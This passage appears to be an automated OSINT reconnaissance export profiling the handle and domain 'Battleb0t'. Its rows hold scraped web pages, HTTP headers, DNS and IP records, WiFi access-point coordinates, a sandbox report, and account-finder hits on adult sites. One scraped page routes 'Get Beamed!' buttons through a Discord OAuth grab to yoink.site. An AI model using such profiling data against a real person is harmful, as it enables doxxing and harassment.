SACdDa6YllLFkTxfyt9PIWPkMFkg4rul1WrPg6PbIgC6s9asfdQz_qx66otvL3jKY2qeghrw_6pmQyfsLCIHyZFw1XaoIueMg-cFKFmIkcBABdWmDDrGq0ut54mYbYK3SFGC_bIHhtVHYt9KTDDqI94HFGgN1Tmq0OS0w3l63uBrjPR2ghPB-fwrkk0mrJ7qhhXURTs1sofuhT9GcdvnMZ1lpgzcElp3IhKAYa_lNxP8ZMf4Q_-TfeYlm0PHPqWivHEqU3GArEQlC_hJ27J0JdZxbF8RZT_qsP9FxBGCfGjgHhGcEmTtiLHMzioIBblPCJ2MJyW1yepTP1gLGj1XQw8vPq1sTASJgCcwQdtLYK1gBygsKJ6y9hq73XXqB7BxmSRGE1412ZH9kqHGFcsBJvpgdfjdZDEcUAbc7eHlE_pUs5mqrXq697Qb125fekHxboBa8kmPIcPQ2ynUBwAN74KYjxXYEmrozv8dkXJqol4LZcUANpwiA11Em8xrLpc2lbtTgwaNEHGyTh_5AUbuVj2YXAm8gMv0JlcPNtTwFxCdA8SE7rXhlJ4zCoy8DSlgGYlbvZ8ijwcet19cfaphrxuan5NDwsNqQSGBQBD2ZBY7HKWcOtfFA0IzjpULqXe_VhCzD0_t3-f5YJ6XZO21">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '16187',
cRay: '7c5f603759cec44a',
cHash: '5c1bdda96dc3363',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'HgohT/b1OM4tsUSGEPixuGnvvV+8jkzKLyX45HU4WdoKt1CyoXgioQGLmYcV9DPAxym7ohL+qPU6akoz/3Kv4jDE5qiLpt0g690Z1V0G6KGqGHPkesBGIYJOSkTiujqDpcxocLCBQ79XH7kLAk8OVa7j2xuxhAkf7tykvodsDRO92HgFm6rNoo9Cc4pq9Hw23quQ/Ag/Dw7fHCOPwdkWoIXGKhVsGwr+1oSvb+i62Ffqr2C/t8TudQSZP04EqcjtlKB4l31gRzqm6aULKZZKHQH5dhkngvCigCKNwW3hn9AmxEaT7NKkPj96+xDmNbHesoN2ACk9cb3W/d0YPCDVKR1HT4e51TpStG90quS33mPQQRwHkie3Xs9LUnGj5sG8Duv0tFosQZ0d2HZZW4zbksxXdaP8TmTByfSbYAcfyuU4CzRSX+Y5Rm9J03m+/gTMFWf25epClffMJPvWQuuF8+FuZwLDOXqs2UqxSUCSOXQCyg20Uk8QGVhEnW7SZrLI6C+LyvwhLlehehPxzaKSJs+0ftOeZ0U1P+CWNJ72yzyn1vk/bmC6oIk8nhtMSrxM',
t: 'MTY4Mzg2MDA1My42NjAwMDA=',
m: 'lfsFj6DGCrI2vGPf6BjuX9qKC3b3WJbZzI/myE7y0Ig=',
i1: 'Gu/vYOwR5DI39saTFLv/iA==',
i2: 'jBLnZ6zLXxRsowEZI/3brw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f603759cec44a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f603759cec44a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:19:17 | Web Framework | No | Web Framework Identifier | 0 | 0 | 3 | 0 | None | Bootstrap | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | babepedia (Category: XXXPORNXXX)
https://www.babepedia.com/user/login | login |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F0:17:4A) | 37.780462,-122.390564 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | trakt (Category: video)
https://trakt.tv/users/login | login |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.106 | 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | luna (Net ID: 00:02:2D:2D:B8:C7) | 50.1188, 8.6843 |
| 2023-05-12 03:00:24 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@lu.ma | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 28, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://lu.ma/y9yw6eqo', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7888:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7888:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7888:120:WilError_01"\n "Local\\SM0:8012:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:8012:120:WilError_01"\n "SM0:8012:120:WilError_01"\n "SM0:7888:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:7888:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7888:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.66.43.101:443"\n "104.16.56.101:443"\n "142.250.188.8:443"\n "34.120.195.249:443"\n "54.203.115.111:443"\n "142.250.191.74:443"\n "151.101.0.176:443"\n "142.250.191.78:443"\n "172.217.164.99:443"\n "142.250.101.156:443"\n "108.139.1.127:443"\n "108.139.1.104:443"\n "52.23.144.23:443"\n "35.174.127.31:443"\n "34.209.51.54:443"\n "44.228.114.110:443"\n "142.251.46.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.lu.ma"\n "cdn.lu.ma"\n "lu.ma"\n "nexus-websocket-a.intercom.io"\n "o370968.ingest.sentry.io"\n "static.cloudflareinsights.com"\n "vitals.vercel-insights.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- [targetUID: N/A]\n "f_00024d" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 6400x3200 components 3"- [targetUID: N/A]\n "5f16b7f9d1607ad6_0" has type "data"- [targetUID: N/A]\n "989898b72cc58f9e_0" has type "data"- [targetUID: N/A]\n "23a55676-8174-4a5e-89fc-143bd604c96f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\index]- [targetUID: 00000000-00007888]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "5e9a6eefc2fa1f8f_0" has type "data"- [targetUID: N/A]\n "f_00023e" has type "data"- [targetUID: N/A]\n "cc4ad257c5413c5b_0" has type "data"- [targetUID: N/A]\n "c4595e73-7693-4c82-9c12-a950739b1d75.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "83213497a6b2b947_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\83213497a6b2b947_0]- [targetUID: 00000000-00007888]\n "d646c3a66fcaef39_0" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- [targetUID: N/A]\n "d96dbad775832460_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "data"- [targetUID: N/A]\n "9d4d031f25631c01_0" has type "data"- [targetUID: N/A]\n "f_00023d" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023d]- [targetUID: 00000000-00007580]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7888_284643122\\Ruleset Data]- [targetUID: 00000000-00007888]\n "4a0cb44c6cfe27cf_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\4a0cb44c6cfe27cf_0]- [targetUID: 00000000-00007888]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://lu.ma/y9yw6eqo"\n Heuristic match: "api.lu.ma"\n Heuristic match: "cdn.lu.ma"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://lu.ma"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "lu.ma"\n Heuristic match: "nexus-websocket-a.intercom.io"\n Heuristic match: "o370968.ingest.sentry.io"\n Heuristic match: "static.cloudflareinsights.com"\n Heuristic match: "vitals.vercel-insights.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "lu.ma/y9yw6eqo"\n Pattern match: "http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-5', u'name': u'Sends UDP traffic', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 1, u'type': 7, u'description': u'"UDP connection to 142.250.188.8"\n "UDP connection to 142.250.191.78"\n "UDP connection to 108.139.1.104"\n "UDP connection to 142.251.46.174"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'type': 8, u'description': u'"adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7888_266005712\\adblock_snippet.js]- [targetUID: 00000000-00007888]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.44" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.44"\n Potential IP "10.34.0.44" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.44\\LICENSE"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Mu"\n Potential IP "1.0.0.23" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\Sigma"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\system32\\RunDll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\System32\\ieframe.dll"\n "192.168.241.73"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="*",type="win32",version="5.1.0.0"C:\\WINDOWS\\WindowsShell.Manifest"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.shell32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\WINDOWS\\System32\\SHELL32.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/86 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'641c61a4603a681d33001968', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspiciou |
| 2023-05-12 02:54:23 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H061ZY9N5FV8EXSVB32WY78R
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/Battleb0t | Battleb0t |
| 2023-05-12 02:44:15 | IPv6 Address | No | DNS Resolver | 16 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | nuke.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=WwRFDMWv1i%2FLL8I%2BSQXrEl8P6VG5M1GGitMkpd4FkAGmtOdqQDCLc17nGzjDcmqZpet%2BvxBX8CUcOAv3alTgafYDwFhVZzoAKiiOmj1uFX8dLMhZ1ZA2lQdL%2FA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60363a5a178c-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:27 | Raw Data from RIRs | No | Tool - WhatWeb | 1 | 0 | 2 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://oldfluid.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://oldfluid.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'report-to,nel,cf-cache-status,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.64.80.1']}}}, {}] | oldfluid.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Snapchat Stories (Category: social)
https://story.snapchat.com/s/login | login |
| 2023-05-12 02:56:27 | Hash | No | Hash Extractor | 0 | 0 | 3 | 0 | None | [MD5] 02ca825e4901e74c2c2d6f8e59341325 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
